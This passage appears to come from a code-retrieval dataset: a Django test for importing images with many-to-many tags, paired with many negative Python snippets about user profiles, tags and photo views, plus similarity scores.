name='Fruity')\n tag = Tag.objects.create(user=self.user, name='Comfort Food')\n\n res = self.client.get(TAGS_URL)\n\n self.assertEqual(res.status_code, status.HTTP_200_OK)\n self.assertEqual(len(res.data), 1)\n self.assertEqual(res.data[0]['name'], tag.name)", "def test_tags_limited_to_user(self):\n imposter = get_user_model().objects.create_user(\n email='[email protected]', password='im_an_imposter')\n Tag.objects.create(user=imposter, name='BAD_FOOD')\n tag = Tag.objects.create(user=self.user, name='fruit')\n res = self.client.get(TAG_URL)\n self.assertEqual(res.status_code, status.HTTP_200_OK)\n self.assertEqual(len(res.data), 1)\n self.assertEqual(res.data[0]['name'], tag.name)", "async def slashtag_user(\n self,\n ctx: commands.Context,\n tag_name: TagName(check_global=False, check_regex=False),\n *,\n tagscript: TagScriptConverter,\n ):\n await self.create_slash_tag(\n ctx, tag_name, tagscript, is_global=False, command_type=ApplicationCommandType.USER\n )", "def test_tags_limited_to_user(self):\n user2 = create_user('[email protected]', 'OtherPassword')\n Tag.objects.create(user=user2, name='Fruity')\n tag = Tag.objects.create(user=self.user, name='Home Food')\n\n res = self.client.get(TAGS_URL)\n\n self.assertEqual(res.status_code, status.HTTP_200_OK)\n self.assertEqual(len(res.data), 1)\n self.assertEqual(res.data[0]['name'], tag.name)", "def test_tags_limited_to_user(self):\n user2 = get_user_model().objects.create_user(\n '[email protected]',\n '123456'\n )\n Tag.objects.create(user=user2, name='Fruity')\n tag = Tag.objects.create(user=self.user, name='Comfort Food')\n\n res = self.client.get(TAGS_URL)\n\n self.assertEqual(res.status_code, status.HTTP_200_OK)\n self.assertEqual(len(res.data), 1)\n self.assertEqual(res.data[0]['name'], tag.name)", "def user(self, uid):", "def get_usernames_from_tag(tag):\n try:\n tag_url = 'https://www.instagram.com/explore/tags/{0}/?__a=1'.format(tag)\n tag_res = requests.get(tag_url).json()\n\n nodes = tag_res['tag']['media']['nodes']\n\n new_urls = [node['code'] for node in nodes]\n new_req = [requests.get('https://www.instagram.com/p/{0}/?__a=1'.format(url)).json() for url in new_urls]\n\n usernames = [req['graphql']['shortcode_media']['owner']['username'] for req in new_req]\n\n return usernames\n\n except Exception as 
err:\n print('{0} - This account was not classified...'.format(str(err)))\n return []", "def profile(request):\n profile = request.user.profile\n return render(request, 'accounts/profile.html', {'profile': profile})", "def user(self):", "def user(request):\n\tprofile = {}\n\tif (request.user.is_authenticated()==True) and(request.user is not None):\n\t\tprofile = UserProfile.objects.get(user_id=request.user)\n\treturn {\n\t\t'user': request.user,\n\t\t'profile':profile\n\t}", "def test_tags_limited_to_user(self):\n user2 = User.objects.create(\n email='[email protected]',\n password='test_password'\n )\n Tag.objects.create(user=user2, name='Fruity')\n Tag.objects.create(user=self.user, name='Comfort Food')\n\n res = self.client.get(TAGS_URL)\n\n tags = Tag.objects.filter(user=self.user).order_by('-name')\n serializer = TagSerializer(tags, many=True)\n\n self.assertEqual(res.status_code, status.HTTP_200_OK)\n self.assertEqual(len(res.data), 1)\n self.assertEqual(res.data, serializer.data)", "def sample_tag(user,name=\"Main Course\"):\n return Tag.objects.create(user=user,name=name)", "def makeProfile(request):\n upr = UserProfile()\n upr.user = request.user\n upr.image = \"images/no-pic.png\"\n upr.save()", "def sample_tag(user,name='main-coures'):\n return Tag.objects.create(user=user, name=name)", "def get_tags(x):\n poster = x['_source']['user']['id']\n for user in x['_source']['users_in_photo']:\n if user['user']['id'] != poster:\n yield (poster, user['user']['id'])", "def user_profile(request):\n user = User.objects.get(email=request.user.email)\n bugs = Bug.objects.filter(author=request.user.id)\n features = Feature.objects.filter(author=request.user.id)\n context = { \n 'bugs' : bugs, \n 'features' : features,\n 'profile' : user,\n }\n \n return render(request, 'profile.html', context)", "def by_user(user):\n return Tag.objects.all().filter(owner=user)", "def user(request, user_id):\n raise NotImplementedError", "def __str__(self):\n return self.user.username + \"'s Profile\"", "def user_profile(request, slug):\n posts = Post.objects.filter(author__username=slug)\n\n following = request.user.profile.followers.filter(username=slug)\n return render(request,\n 'posts/profile.html',\n {'posts': posts,\n 'author': User.objects.get(username=slug),\n 'following': following})", "def sample_tag(user, name='Main course'):\n return Tag.objects.create(user=user, name=name)", "def sample_tag(user, name='Main course'):\n return Tag.objects.create(user=user, name=name)", "def test_tags_limited_to_user(self):\n\n user2 = get_user_model().objects.create_user(\n email='[email protected]',\n password='23pass1234&'\n )\n\n Tag.objects.create(user=self.user, name='Vegan')\n Tag.objects.create(user=self.user, name='Dessert')\n Tag.objects.create(user=user2, name='Valami mas')\n\n res = self.client.get(TAGS_URL)\n\n tags = Tag.objects.filter(user=self.user).order_by('-name')\n serializer = TagSerializer(tags, many=True)\n\n self.assertEqual(res.status_code, status.HTTP_200_OK)\n self.assertEqual(len(res.data), len(tags))\n self.assertEqual(res.data, serializer.data)", "def test_tags_limited_to_authenticated_user(self):\n\n # Create a new user in addition to the user created in\n # the setUp, and leave it without an authentication.\n credentials = {'email': '[email protected]', 'password': 'Testpass34'}\n new_user = get_user_model().objects.create_user(**credentials)\n\n # Create a tag that is assigned to the new user.\n Tag.objects.create(user=new_user, name='Fruity')\n\n # Create a tag that is assigned to 
the authenticated user.\n tag = Tag.objects.create(user=self.user, name='Comfort Food')\n\n response = self.client.get(URL_TAGS)\n\n # Check that the response is HTTP 200, and includes only one tag.\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n self.assertEqual(len(response.data), 1)\n\n # Check that the name of the returned tag matches with the\n # name of the tag that was assigned to the authenticated user.\n self.assertEqual(response.data[0]['name'], tag.name)", "def profile(request):\n user = Info.objects.all()\n return render(request, 'kvent/profile.html',{user:'user'})", "def getUserProfile(request):\n user = request.user\n serializer = UserSerializer(user, many=False)\n return Response(serializer.data)", "def sample_tags(user, name='Main cuisine'):\n return Tag.objects.create(user=user, name=name)", "def profile(request):\n auth, created = AuthProfile.objects.get_or_create(user=request.user)\n if not request.user.is_authenticated():\n raise Exception(\"Not Logged in\")\n\n token, created = Token.objects.get_or_create(user=request.user)\n context = {}\n context['TOKEN'] = token.key\n\n return context", "def user(self):\n pass", "def manage_user_profile(sender, instance, created, **kwargs):\n if created:\n Profile.objects.create(user=instance)\n else:\n instance.profile.save()", "def get_context_data(self, **kwargs):\n user = ImagerProfile.objects.get(user__username=self.request.user.username)\n # import pdb;\n context = super(ProfileView, self).get_context_data(**kwargs)\n photos = self.request.user.photos.all()\n ph_public = len(photos.filter(published=\"Public\"))\n ph_private = len(photos.filter(published=\"Private\"))\n albums = self.request.user.albums.all()\n al_public = len(albums.filter(published=\"Public\"))\n al_private = len(albums.filter(published=\"Private\"))\n context = {'user': user, 'ph_public': ph_public, 'ph_private': ph_private,\n 'al_public': al_public, 'al_private': al_private}\n return context", "async def mytags(ctx):\n if ctx.message.channel.name.lower() not in bot_channels:\n return\n display = ctx.message.author.display_name\n display_tags = []\n if not user_tags.get(ctx.message.author.name, None):\n return\n for tag_key, tag_count in user_tags[ctx.message.author.name]['tags'].items():\n display_tags.append(\"{0} ({1})\".format(tag_key, tag_count))\n await amor_manager.say(\"{0}'s tag usage: \\n ```{1}```\".format(display, \"\\n\".join(display_tags)))", "def tags():", "def view_friends(request, username):\n user = get_object_or_404(user_model, username=username)\n qs = Friend.objects.select_related(\"UserProfile\").filter(to_user=user)\n friends = [u.from_user for u in qs]\n self = navbar(request.user.id)\n user1 = self.user.id\n for i in friends:\n to_user = i.id\n i.user2 = str(user1)+\"|\"+str(to_user)\n return render_to_response( 'view_friends.html', {'friends': friends, 'self':self})", "def on_user_create(self, user):", "def view_user(request, userid):\n user_to_view = User.objects.get(id=userid)\n profile = Profile.objects.get(user=user_to_view)\n dogs = Dog.objects.all().filter(owner=user_to_view)\n\n return render(request, 'woofer/view_user.html',\n {\n 'profile' : profile,\n 'dogs' : dogs\n })", "def _profile(user):\n profile = UserProfile()\n profile.user_id = user.id\n profile.save()", "def sample_tag(user, name='Service Tag'):\n return Tag.objects.create(user=user, name=name)", "def make_profile_for_user(sender, instance, **kwargs):\n if kwargs['created']:\n new_profile = ImagerProfile(user=instance)\n new_profile.save()", "def 
sample_tag(user, name='sample tag'):\n return Tag.objects.create(user=user, name=name)", "def save_user_profile(sender, instance, **kwargs):\n instance.profile.save()", "def save_user_profile(sender, instance, **kwargs):\n instance.profile.save()", "def userProfile(userid):\n images = get_uploaded_images()\n record = UserProfile.query.filter_by(id=userid).first()\n return render_template('userProfile.html', images=images, record =record)", "def create_sample_tag(user, name=\"spicy\"):\n return Tag.objects.create(custom_user=user, name=name)", "def profile(username):\n try:\n user = mongo.db.users.find_one({\"username\": username})\n terms = list(mongo.db.terms.find(\n {\"submitted_by\": user[\"_id\"], \"rating\": {\"$gt\": -2}}))\n ordered = sortTermsAlphabetically(terms)\n toprated = sortTermsByRating(terms)\n games = list(mongo.db.games.find())\n return render_template(\n \"profile.html\", user=user, terms=ordered,\n toprated=toprated, games=games)\n except TypeError:\n flash(\"This user does not exist\", category=\"error\")\n return redirect(url_for(\"get_terms\"))", "def user_profile(request, id):\n user = User.objects.get(id=id)\n\n return render(request, \"core/profile.html\",{\n \"user\": user,\n \"range\": range(user.stars),\n \"bids_placed\": BuyProduct.objects.filter(\n customer = user\n )\n })", "def create_profile(sender, instance, created, **kwargs):\n if created: \n profile, new = UserProfile.objects.get_or_create(user=instance)", "def save_user_profile(instance, **_):\n instance.profile.save()", "def view_user(user):\n return {\n \"id\": user.id,\n \"first_name\": user.first_name,\n \"last_name\": user.last_name,\n \"email\": user.email,\n \"profile_pic\": user.profile_pic,\n }", "def createUserProfile(user):\n MyProfile.objects.get_or_create(user=user)", "def test_profile_associated_with_users(self):\n profile = ImagerProfile.objects.first()\n self.assertTrue(hasattr(profile, 'user'))\n self.assertIsInstance(profile.user, User)", "def profile_detail(request, pk):\n profile = request.user.userprofile\n user_relationships = profile.get_relationships()\n user_request = profile.get_friend_request()\n\n context = {\n # 'user': user,\n 'profile': profile,\n 'user_relationships': user_relationships,\n 'user_request': user_request\n }\n\n return render(request, 'accounts/profile_detail.html', context)", "def create_profile(sender, **kwargs):\n user = kwargs[\"instance\"]\n if kwargs[\"created\"]:\n user_profile = Profile(user=user)\n user_profile.save()", "def __str__(self):\n return f\"Profile for user {self.user}\"", "def sample_tag(user, name = 'Main Course'): # no need to use **params here since we have only 2 arguments\n return Tag.objects.create(user=user, name=name)", "def profile(request, id):\n u = get_object_or_404(User, pk=id)\n context = ProfileContext(u).get_context()\n return render(request, 'wantedly_app/profile.html', context)", "def show_user_profile(username):\n\n name = USERS[username]\n return f\"<h1>Profile for {name}</h1>\"", "def profile():\n recipes = mongo.db.recipes.find({\"created_by\": session[\"user\"]})\n return render_template(\"accounts/profile.html\", recipes=recipes)", "def view_profile():\n user_id = session.get(\"user_id\")\n \n user = User.query.get(session[\"user_id\"])\n \n return render_template(\"editable_profile_page.html\", user=user)", "def create_profile(sender, **kw):\n user = kw['instance']\n if kw['created']:\n profile = UserProfile(user=user)\n profile.save()", "def get_tagged_user(line, unique_users):\n tagged_user = None\n\n for 
user in unique_users:\n \n tagged_user = re.search(f\"@{user}\\s*\", line)\n \n if tagged_user != None:\n tagged_user = tagged_user.group(0).replace(\"@\", \"\").strip()\n line = line.replace(f\"@{user} \", \"\")\n break\n \n return (tagged_user, line)", "def user_detail(request, slug):\n user = request.user\n profile = Profile.objects.get(slug=slug)\n albums = profile.albums.all()\n plc_albums = albums.exclude(is_public=False)\n pvt_albums = albums.exclude(is_public=True)\n\n friends = profile.friends.all()\n family = profile.relations.all()\n user_family = user.profile.relations.all()\n user_friends = user.profile.friends.all()\n\n receiver = FriendRequest.objects.filter(from_user=profile.user)\n sender = FriendRequest.objects.filter(to_user=profile.user)\n \n received = []\n sent = []\n for item in receiver:\n received.append(item.id)\n received.append(item.to_user)\n\n for item in sender:\n received.append(item.id)\n sent.append(item.from_user)\n\n template = 'profiles/user_detail.html'\n context = {\n 'profile': profile,\n 'friends': friends,\n 'family': family,\n 'albums': albums,\n 'plc_albums': plc_albums,\n 'pvt_albums': pvt_albums,\n 'received': received,\n 'sent': sent,\n 'user_family': user_family,\n 'user_friends': user_friends,\n }\n return render(request, template, context)", "def user_profile(request, pk=None):\n # user is indentified by his email\n user = User.objects.get(email=request.user.email)\n # show profileposts, fist identifying the user and then ordering by date, new first\n profileposts = ProfilePost.objects.filter(user=request.user).filter(published_date__lte=timezone.now()\n ).order_by('-published_date').all()\n # show messages to user, ordering by date, new first. In template an if statement makes sure only the messages of the logged-in user show\n contactuserposts = ContactUser.objects.all().filter(date__lte=timezone.now()\n ).order_by('-date').all() \n return render(request, 'profile.html', {\"profile\": user, 'profileposts': profileposts, 'contactuserposts': contactuserposts})", "def projects_with_tag(request, tag):\n return tag.project_set.filter(user=request.user)", "def create_user_profile(sender, **kwargs):\n\n if kwargs['created']:\n UserProfile.objects.create(user=kwargs['instance'])", "def profile(username):\n username = mongo.db.users.find_one(\n {\"username\": session[\"user\"]})[\"username\"]\n\n tips = list(mongo.db.tips.find())\n return render_template(\"profile.html\", tips=tips)\n\n if session[\"user\"]:\n return render_template(\"profile.html\", username=username)\n\n return redirect(url_for(\"login\"))", "def extract_user_short(data):\n user_pk = data.get(\"id\", data.get(\"pk\"))\n assert user_pk, 'User without pk \"%s\"' % data\n return {\n \"pk\": int(user_pk),\n \"username\": data[\"username\"],\n \"full_name\": data[\"full_name\"],\n \"is_private\": data.get(\"is_private\"),\n \"profile_pic_url\": data[\"profile_pic_url\"],\n \"is_verified\": data.get(\"is_verified\"),\n # \"is_unpublished\": data.get(\"is_unpublished\"),\n }", "def profile_for(email):\n return OrderedDict([(b'email', email), (b'uid', b'10'), (b'role', b'user')])", "def profile(request, username):\n # Get profile information for a user. 
Use iexact for case-insensitive query\n try:\n profile = User.objects.get(username__iexact=username)\n except ObjectDoesNotExist:\n profile = None\n return render(request, \"network/profile.html\", {\"profile\": profile})\n\n # Find all users following the user whose profile being visited\n followers = User.objects.filter(following=profile.id)\n\n # Get posts for users and put in paginator format\n posts = Post.objects.filter(author=profile).order_by('-timestamp')\n paginator = Paginator(posts, 10)\n\n page_number = request.GET.get('page')\n page_object = paginator.get_page(page_number)\n\n return render(request, \"network/profile.html\", {\n \"profile\": profile, \"followers\": followers, \"posts\": page_object\n })", "def userView(request):\n context = {\n \"user\": request.user,\n }\n return render(request, 'blog/user.html', context)", "def user():", "def save_user_receiver(sender, instance, created, *args, **kwargs):\n print(\"profile created\", instance)\n if created:\n new_profile = UserProfile.objects.get_or_create(owner=instance)", "def getInterestedUsers():", "def view_profile(request, userid=None):\n # Show the currently logged in user's profile if none is specified\n if userid is None:\n user = request.user\n else:\n user = User.objects.get(id=userid)\n profile = Profile.objects.get(user=user)\n dogs = Dog.objects.all().filter(owner=user)\n\n return render(request, 'woofer/view_profile.html',\n {\n 'profile' : profile,\n 'dogs' : dogs\n })", "def test_tag_is_in_the_template(self):\n\n template = Template(\n '{% load profile_admin_editing %}{% edit_link profile %}')\n\n context = Context({'profile': self.profile})\n\n self.assertEqual(self.super_link, template.render(context))", "def getUserCounts(tag, lastNesting=False):\n # Sprawdz czy bez lastNesting (jeszcze bool w wywol fun. 
w collectDatebase) jest szybciej.\n uc, tagDict = {}, {}\n # Petla po wszystkich wejsciach\n for p1 in pydelicious.get_tagposts(tag):\n user = p1['user']\n if user:\n uc.setdefault(user, 0)\n uc[user] += 1\n # tagDict = {tagDict.setdefault(p2['tags'].replace (' ', '_'), 1) for p2 in pydelicious.get_userposts(p1['user']) if p2['tags']}\n if lastNesting:\n break\n for p2 in pydelicious.get_userposts(p1['user']):\n if p2['tags']:\n tagDict.setdefault(p2['tags'].replace(' ', '_'), 1)\n return (user, uc), tagDict", "def profile(request, user_name=None):\n \n # get the viewed user\n if user_name is None:\n user = request.user.get_profile()\n else:\n user = get_object_or_404(User, username=user_name)\n user = user.get_profile()\n \n # set display name\n if len(user.user.first_name) <= 0:\n user.display_name = user.user.username\n else:\n user.display_name = user.user.first_name + \" \" + user.user.last_name\n \n # set avatar path\n if len(user.avatar.name) <= 0:\n user.avatar_url = settings.MEDIA_URL + \"avatar/noavatar.png\"\n else:\n user.avatar_url = user.avatar.url\n \n # get tracked list, ownedlist and playlist\n trackedlist = user.trackedrecordlist_set.all()\n ownedlist = user.userentry_set.all()\n playlist = user.playlist_set.all()\n context = {\n 'profile_user': user,\n 'trackedlist': trackedlist,\n 'ownedlist': ownedlist,\n 'playlist': playlist\n }\n return render_to_response(\n 'usermgr/profile.html',\n context,\n context_instance = RequestContext(request))", "def author_profile(request, pk):\n author = get_object_or_404(User, pk=pk)\n profileposts = ProfilePost.objects.filter(user=author).filter(published_date__lte=timezone.now()\n ).order_by('-published_date').all()\n return render(request, 'profile.html', {\"profile\": author, 'profileposts': profileposts})", "def tag_list(request):\r\n rdict = request.matchdict\r\n username = rdict.get(\"username\", None)\r\n if username:\r\n username = username.lower()\r\n\r\n tags_found = TagMgr.find(username=username)\r\n\r\n return {\r\n 'tag_list': tags_found,\r\n 'tag_count': len(tags_found),\r\n 'username': username,\r\n }", "def add_profile_photo():\n pass", "def user_profile_page(request, pk=None):\n userprofile = get_object_or_404(User, pk=pk)\n profileposts = ProfilePost.objects.filter(user=userprofile).filter(published_date__lte=timezone.now()\n ).order_by('-published_date').all() \n return render(request, 'profile.html', {\"profile\": userprofile, 'profileposts': profileposts})", "def create_profile(sender, instance, created, **kwargs):\n if created:\n profile, created = UserProfile.objects.get_or_create(user=instance)", "def profile(request):\n return render(request, 'profile.html', context)", "def renderProfile(request, user, identities):\n sourcesResults = lifestream.models.Feed.objects.order_by('url').filter(user__username=user.username)\n sources = []\n for s in sourcesResults:\n if s.title:\n sources.append({'title': s.title, 'url': s.url})\n \n # avatar\n \n gravatarHash = hashlib.md5(user.email).hexdigest()\n avatar_url = \"http://www.gravatar.com/avatar/%s.jpg?d=monsterid&s=80\" % gravatarHash\n \n t = django.template.loader.select_template(('foo', 'lifestream/profile_blurb.html'))\n c = django.template.Context(\n {'avatar_src': avatar_url, 'avatar_width':'80', 'avatar_height':'80',\n 'user': user,\n 'username': user.username,\n 'preferences': json.loads(user.get_profile().properties),\n 'sources': sources,\n 'identities': identities})\n return t.render(c)", "def getdat(user):\r\n profile = user.profile\r\n return 
[user.username, user.email] + [getattr(profile, xkey, '') for xkey in profkeys]", "def perform_create(self, serializer): # this method runs everytime a POST method is called\n serializer.save(user_profile=self.request.user)", "def get_one_user():", "def tagger():", "def public_profile(request, username):\n if User.objects.filter(username__iexact=username, is_active=True).exists():\n public_user = User.objects.get(username__iexact=username)\n public_email = public_user.associated_emails.filter(is_public=True).first()\n else:\n raise Http404()\n\n # get list of projects\n projects = PublishedProject.objects.filter(authors__user=public_user).order_by('-publish_datetime')\n\n\n return render(request, 'user/public_profile.html', {\n 'public_user':public_user, 'profile':public_user.profile,\n 'public_email':public_email, 'projects':projects})", "def user_post_save(sender, instance, created, **kwargs):\n\t\tif created == True:\n\t\t\tup = UserProfile()\n\t\t\tup.user = instance\n\t\t\tup.save()", "def get_user_profile(self):\n return self.request('get', 'id/users')", "def image_thumb_tag(self):\n u = self.user\n uf = self.app.url_for\n image = None\n if u.image is not None and u.image!=\"\":\n try:\n image = uf(\"asset\", asset_id = self.app.module_map.uploader.get(u.image).variants['userlist']._id)\n except AssetNotFound:\n pass\n except KeyError:\n pass\n if image is not None:\n return \"\"\"<img alt=\"%s\" class=\"profile-image-userlist\" src=\"%s\">\"\"\" %(u.fullname, image)\n return \"\"\"<div class=\"profile-image-userlist missing\"><i class=\"fa fa-user\"></i></div>\"\"\"", "def get_context_data(self, **kwargs):\n username = self.kwargs.get('username', None)\n if username:\n user = get_object_or_404(User, username=username)\n try:\n profile = user.get_profile()\n except Profile.DoesNotExist:\n raise Http404\n context_data = super(PhotosListView, self).get_context_data(**kwargs)\n context_data['profile'] = profile\n return context_data\n\n return super(PhotosListView, self).get_context_data(**kwargs)", "def get_profile(user_id):\n return User.objects.select_related('userprofile', 'userstatistics') \\\n .get(pk=user_id)", "def create_user_profile(sender, instance, created, **kwargs):\n if created:\n user_profile = UserProfile.objects.create(user=instance)" ]
[ "0.6036632", "0.59151506", "0.5854669", "0.5790308", "0.5763715", "0.574283", "0.5727083", "0.57143545", "0.57116055", "0.56976116", "0.5677059", "0.5661893", "0.56557196", "0.56339324", "0.5570487", "0.5566566", "0.5553686", "0.5552441", "0.55499566", "0.5542527", "0.5512405", "0.5504821", "0.54956746", "0.5484684", "0.542978", "0.54278225", "0.5427484", "0.5427484", "0.5407592", "0.5376521", "0.53692675", "0.53495944", "0.5341351", "0.53324896", "0.52820903", "0.5276733", "0.52762914", "0.52740175", "0.52638125", "0.5261291", "0.52530897", "0.52502257", "0.5233098", "0.521106", "0.52014023", "0.5192947", "0.51896083", "0.51896083", "0.5186795", "0.51815104", "0.5179892", "0.5177855", "0.5152058", "0.51517266", "0.51491225", "0.51446295", "0.514165", "0.5133557", "0.51105326", "0.51033485", "0.50978976", "0.5096247", "0.5089292", "0.5073722", "0.5070082", "0.50506836", "0.50493187", "0.5043407", "0.50425094", "0.5039894", "0.5037675", "0.50311464", "0.5031005", "0.5025469", "0.50250334", "0.50121886", "0.500064", "0.49964982", "0.49951017", "0.49924913", "0.4987323", "0.4972659", "0.4971254", "0.49682057", "0.49681073", "0.49667114", "0.49654046", "0.49644175", "0.49590638", "0.4950115", "0.49469864", "0.4942378", "0.4938487", "0.4936969", "0.4933872", "0.49323708", "0.49317524", "0.49303073", "0.49291107", "0.4924284", "0.49241185" ]
0.0
-1
Image (m)(m)> Tag > UserProfile > User
e.g. see factory.create_tags_images for the creation of the below items
> We'll assert that populating related data on the m2m field
  > constructs the expected results
  > retrieves the correct results
  > doesn't retrieve the incorrect results

Image.pk  Image.name  Tag.name
i         grass       green
i         grass       blue
k         sun         yellow
l         grass
m         sun
def test_m2m_dependent_object_import(self):
    user_profile: UserProfile = self.user_profiles[0]  # See self.setUp()

    # ************ First Handle generating the Tags/Images Synthetically Through the Importer ************
    # Initialize Importers
    image_manager = ImporterManager(importer=ImageImporter())
    tag_manager = ImporterManager(importer=TagImporter())
    up_manager = ImporterManager(importer=UserProfileImporter())
    company_manger = ImporterManager(importer=CompanyImporter())
    user_manager = ImporterManager(importer=UserImporter())

    # Populate leaf models of dependency tree with kv data
    for row,image in enumerate(self.images):
        user_manager.update_kvs(field_name='username', value=user_profile.user.username, row=row)
        company_manger.update_kvs(field_name='natural_id', value=self.company.natural_id, row=row)

    #: Retrieve data associated with kv data
    user_manager.get_available_rows()
    company_manger.get_available_rows()

    #: Populate data up the dependency tree with retrieved rows
    for row,image in enumerate(self.images):
        up_manager.update_kvs('company', company_manger.get_object_or_list(row), row=row)
        up_manager.update_kvs('user', user_manager.get_object_or_list(row), row=row)

    #: Retrieve data associated with models depended upon
    up_manager.get_available_rows()

    tag_manager.update_kvs('slug', 'blue', row=0, col=0)
    tag_manager.update_kvs('slug', 'green', row=0, col=1)
    tag_manager.update_kvs('company', company_manger.get_object_or_list(0), row=0, col=0)
    tag_manager.update_kvs('created_by', up_manager.get_object_or_list(0), row=0, col=0)

    tag_manager.update_kvs('slug', 'yellow', row=1, col=0)
    tag_manager.update_kvs('company', company_manger.get_object_or_list(1), row=1, col=0)
    tag_manager.update_kvs('created_by', up_manager.get_object_or_list(1), row=1, col=0)

    #: Retrieve associate intermediate data
    tag_manager.get_available_rows()

    for row,image in enumerate(self.images):
        image_manager.update_kvs('path', image.path, row=row)
        image_manager.update_kvs('name', image.name, row=row)
        image_manager.update_kvs('tag', tag_manager.get_object_or_list(row), row=row)
        image_manager.update_kvs('company', company_manger.get_object_or_list(row), row=row)

    image_manager.get_available_rows()

    self.assertNotEqual(image_manager.get_object_or_list(0), [])
    self.assertIsInstance(image_manager.get_object_or_list(0), Image)

    self.assertNotEqual(image_manager.get_object_or_list(1), [])
    self.assertIsInstance(image_manager.get_object_or_list(1), Image)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def test_image(self):\n\n image = Image.query.filter(Image.tag1 == \"Denali\").first()\n self.assertEqual(image.tag1, \"Denali\")", "def test_users_photos_view_set_get_own_photos(self):\n # Create user and data\n user = account_models.User.objects.create_user(email='[email protected]', password='pass', username='aov_hov')\n category = photo_models.PhotoClassification.objects\\\n .create_or_update(name='Test', classification_type='category')\n\n photo1 = photo_models.Photo(image=Photo(open('apps/common/test/data/photos/photo1-min.jpg', 'rb')), user=user)\n photo1.save()\n photo1.category.set([category])\n photo1.save()\n\n photo2 = photo_models.Photo(image=Photo(open('apps/common/test/data/photos/photo2-min.jpg', 'rb')), user=user)\n photo2.save()\n photo2.category.set([category])\n photo2.save()\n\n # Simulate auth\n token = test_helpers.get_token_for_user(user)\n\n # Get data from endpoint\n client = APIClient()\n client.credentials(HTTP_AUTHORIZATION='Token ' + token)\n\n request = client.get('/api/users/{}/photos'.format(user.id), format='json')\n result = request.data['results']\n\n self.assertEquals(request.status_code, 200)\n self.assertEquals(len(result), 2)\n self.assertEquals(result[0]['id'], photo2.id) # newest first\n self.assertIn('dimensions', result[0])\n self.assertIn('image_blurred', result[0])\n self.assertIn('image', result[0])", "def test_ingredients_by_id_image(self):\n pass", "def test_album_image_user(self):\n self.assertEqual(self.album.user, self.photo.user)", "def test_add_to_bag(self):\n user = User.objects.create(username='test')\n image = Image.objects.create(\n img_title='test', base_price=0, user_id=user)\n bag = {image.id: 1}\n response = self.client.post('/images/', bag)\n self.assertEqual(response.status_code, 200)", "def test_aov_web_user_view_get_successful(self):\n # Create test data\n # weight of 1\n user = account_models.User.objects.create_user(age=25, email='[email protected]', first_name='Martin',\n last_name='Ronquillo', location='Boise',\n social_name='@ronquilloaeon', password='pass',\n username='aov_hov')\n # weight of 6\n other_user = account_models.User.objects.create_user(email=\"[email protected]\", password=\"test\", username=\"testy\")\n category = PhotoClassification.objects.create_or_update(name='Test', classification_type='category')\n\n\n photo1 = Photo(image=Image(open('apps/common/test/data/photos/photo1-min.jpg', 'rb')), user=user)\n photo1.save()\n photo1.category.set([category])\n photo1.save()\n PhotoComment.objects.create_or_update(photo=photo1, comment=\"Nice one!\", user=other_user)\n\n photo2 = Photo(image=Image(open('apps/common/test/data/photos/photo2-min.jpg', 'rb')), user=other_user)\n photo2.save()\n photo2.category.set([category])\n photo2.save()\n\n request = APIClient().get('/api/aov-web/users/top', format='json')\n results = request.data[\"results\"]\n\n self.assertEqual(len(results), 2)\n self.assertEqual(results[0][\"id\"], other_user.id)\n self.assertEqual(results[1][\"id\"], user.id)", "def test_images(self):\n\n message = {\"method\": \"images\", \"params\": {\"elem\": None}}\n response = yield self._get_response(message)\n\n self.assertIsInstance(response, dict)\n self.assertEqual(response[\"method\"], \"images\")\n self.assertIsInstance(response[\"result\"], list)\n\n images = [i[\"tag\"] for i in response[\"result\"]]\n\n self.assertIn(self.tag_image, images)", "def setUp(self):\n # slugify_unique should return 'foo\n # so image names would be just 'foo.jpg'\n with mock.patch.object(\n models,\n 
'slugify_unique',\n return_value='foo'\n ):\n # create an image attached to the content object\n self.image = models.Image.objects.create(\n image=get_image_in_memory_data(),\n position=0,\n content_type=ContentType.objects.get_for_model(TestModel),\n object_id=self.object.id\n )\n # load created image from the database\n # it's necessary because the Image.image value differs\n # in loaded images (the field adds the path while saving)\n # created image: foo.jpg\n # loaded image: gallery/foo.jpg\n self.image = self.get_image()", "def test_users_photos_view_set_get_successful(self):\n # Create user and data\n access_user = account_models.User.objects.create_user(email='[email protected]', password='pass', username='m')\n user = account_models.User.objects.create_user(email='[email protected]', password='pass', username='aov_hov')\n category = photo_models.PhotoClassification.objects\\\n .create_or_update(name='Test', classification_type='category')\n\n photo1 = photo_models.Photo(image=Photo(open('apps/common/test/data/photos/photo1-min.jpg', 'rb')), user=user)\n photo1.save()\n photo1.category.set([category])\n photo1.save()\n\n photo2 = photo_models.Photo(image=Photo(open('apps/common/test/data/photos/photo2-min.jpg', 'rb')), user=user)\n photo2.save()\n photo2.category.set([category])\n photo2.save()\n\n # Simulate auth\n token = test_helpers.get_token_for_user(access_user)\n\n # Get data from endpoint\n client = APIClient()\n client.credentials(HTTP_AUTHORIZATION='Token ' + token)\n\n request = client.get('/api/users/{}/photos'.format(user.id), format='json')\n result = request.data['results']\n\n self.assertEquals(request.status_code, 200)\n self.assertEquals(len(result), 2)\n self.assertEquals(result[0]['id'], photo2.id) # newest first\n self.assertIn('dimensions', result[0])\n self.assertIn('image_blurred', result[0])\n self.assertIn('image', result[0])", "def test_list_image_metadata(self):\n pass", "def test_get_owner_image(self):\n\n # user1 is owner of image_id 1\n # user2 is owner of image ids (2,3)\n for image_id in range(1, 4):\n url = reverse(self.url_name_one, args=(image_id,))\n if image_id == 1:\n self.client.force_authenticate(self.user1)\n else:\n self.client.force_authenticate(self.user2)\n\n response = self.client.get(url, format=\"json\")\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n if image_id == 1:\n self.assertEqual(response.data[\"owner\"], \"user1\")\n else:\n self.assertEqual(response.data[\"owner\"], \"user2\")\n\n # user2 try to get image_id 1 which is owner user1\n url = reverse(self.url_name_one, args=(1,))\n response = self.client.get(url, format=\"json\")\n self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)", "def test_retrieval_of_user_photos(self):\t\n\t\tget_response = self.client.get(reverse('photos'))\n\n\t\tself.assertEqual(get_response.status_code, status.HTTP_200_OK)\n\t\tdata = [i.values() for i in get_response.data]\n\t\tself.assertIn(u'{}'.format(self.image_name), data[0])", "def test_create(self):\n data = {\n 'image': images.load_image()\n }\n photo = Photo.objects.create(**data)\n self.assertTrue(photo.pk)", "def test_list_image(self):\n pass", "def test_user_photo_retrieval_by_id_succeeds(self):\n\t\t# url = 